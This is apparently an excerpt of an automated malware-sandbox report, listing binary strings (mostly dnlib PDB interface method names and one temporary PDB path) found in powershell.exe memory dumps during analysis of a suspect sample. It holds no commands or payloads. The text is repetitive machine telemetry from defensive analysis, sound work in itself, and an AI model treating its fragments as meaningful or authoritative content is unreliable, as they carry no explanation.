                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdbhP source: powershell.exe, 00000014.00000002.494874589.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
